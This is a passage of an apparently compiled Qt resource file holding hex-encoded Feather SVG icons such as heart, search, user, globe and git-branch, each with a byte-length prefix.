\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x61\x72\x74\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\x38\
\x34\x20\x34\x2e\x36\x31\x61\x35\x2e\x35\x20\x35\x2e\x35\x20\x30\
\x20\x30\x20\x30\x2d\x37\x2e\x37\x38\x20\x30\x4c\x31\x32\x20\x35\
\x2e\x36\x37\x6c\x2d\x31\x2e\x30\x36\x2d\x31\x2e\x30\x36\x61\x35\
\x2e\x35\x20\x35\x2e\x35\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x37\
\x38\x20\x37\x2e\x37\x38\x6c\x31\x2e\x30\x36\x20\x31\x2e\x30\x36\
\x4c\x31\x32\x20\x32\x31\x2e\x32\x33\x6c\x37\x2e\x37\x38\x2d\x37\
\x2e\x37\x38\x20\x31\x2e\x30\x36\x2d\x31\x2e\x30\x36\x61\x35\x2e\
\x35\x20\x35\x2e\x35\x20\x30\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\
\x37\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x62\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x6f\x6f\x6d\x2d\
\x6f\x75\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\
\x38\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\
\x22\x20\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\
\x22\x31\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\
\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\
\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x8c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\
\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\
\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\
\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\
\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x34\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\
\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x65\x61\x74\x68\
\x65\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x2e\x32\x34\x20\x31\x32\x2e\x32\x34\x61\x36\x20\x36\x20\x30\x20\
\x30\x20\x30\x2d\x38\x2e\x34\x39\x2d\x38\x2e\x34\x39\x4c\x35\x20\
\x31\x30\x2e\x35\x56\x31\x39\x68\x38\x2e\x35\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x32\x22\
\x20\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x2e\x35\x22\x20\
\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\
\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x34\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x61\x72\x63\
\x68\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\x38\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\x22\x31\
\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x53\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x2d\
\x6f\x70\x65\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x20\x33\x68\x36\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\
\x34\x20\x34\x76\x31\x34\x61\x33\x20\x33\x20\x30\x20\x30\x20\x30\
\x2d\x33\x2d\x33\x48\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\x33\x68\x2d\
\x36\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\x20\x34\x76\
\x31\x34\x61\x33\x20\x33\x20\x30\x20\x30\x20\x31\x20\x33\x2d\x33\
\x68\x37\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x15\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x77\x69\x74\x63\
\x68\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\
\x32\x48\x33\x76\x31\x36\x68\x35\x76\x34\x6c\x34\x2d\x34\x68\x35\
\x6c\x34\x2d\x34\x56\x32\x7a\x6d\x2d\x31\x30\x20\x39\x56\x37\x6d\
\x35\x20\x34\x56\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x34\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x75\x73\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\
\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x20\x32\x31\
\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\x2d\
\x34\x48\x38\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\x20\
\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\x72\
\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\
\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x94\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x78\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x20\
\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\
\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\
\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\x35\x22\x20\x63\
\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\
\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x38\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x32\x33\
\x22\x20\x79\x32\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\
\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x38\x22\x20\x79\x32\
\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x99\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x6c\x6f\x62\x65\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\
\x32\x3d\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x32\x20\x32\x61\x31\x35\x2e\x33\x20\x31\x35\x2e\x33\x20\x30\
\x20\x30\x20\x31\x20\x34\x20\x31\x30\x20\x31\x35\x2e\x33\x20\x31\
\x35\x2e\x33\x20\x30\x20\x30\x20\x31\x2d\x34\x20\x31\x30\x20\x31\
\x35\x2e\x33\x20\x31\x35\x2e\x33\x20\x30\x20\x30\x20\x31\x2d\x34\
\x2d\x31\x30\x20\x31\x35\x2e\x33\x20\x31\x35\x2e\x33\x20\x30\x20\
\x30\x20\x31\x20\x34\x2d\x31\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x79\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x62\
\x72\x61\x6e\x63\x68\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x36\x22\x20\x79\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x36\
\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x22\
\x20\x63\x79\x3d\x22\x36\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\
\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x39\x61\x39\x20\x39\x20\
\x30\x20\x30\x20\x31\x2d\x39\x20\x39\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
